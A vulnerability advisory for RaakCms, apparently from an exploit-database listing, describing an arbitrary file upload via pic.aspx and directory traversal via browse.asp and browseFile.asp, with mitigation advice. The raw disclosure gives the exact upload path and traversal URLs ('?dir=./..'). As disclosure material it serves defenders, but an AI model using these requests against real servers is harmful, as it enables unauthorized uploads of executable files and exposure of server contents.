Arbitrary File Upload & Directory Traversal in RaakCms

vendor:

RaakCms

by:

Pouya Daneshmand

8,8

CVSS

HIGH

Arbitrary File Upload & Directory Traversal

434, 22

CWE

Product Name: RaakCms

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Arbitrary File Upload & Directory Traversal in RaakCms

An attacker can upload arbitrary files to the server by exploiting the 'pic.aspx' page. An attacker can also traverse the directory structure of the server by exploiting the 'browse.asp' and 'browseFile.asp' pages.

Mitigation:

Restrict access to the 'pic.aspx', 'browse.asp' and 'browseFile.asp' pages and ensure that only authorized users can access them. Ensure that all uploaded files are scanned for malicious content.

Source

Exploit-DB raw data:

#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: RaakCms
# Vendor: http://raakcms.com
#################################################################
Vulnerability:
=======================
Arbitrary File Upload
=======================
http://server/webmaster/pic.aspx
select file and folder , your file upload here:
http://server/User_Images/[Folder]/FILE.ASPX

=======================
Directory Traversal
=======================
http://server/browse.asp?dir=./..
http://server/browseFile.asp?dir=./..
#################################################################

#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran@yahoo.com<mailto:whh_iran@yahoo.com>
###################################################################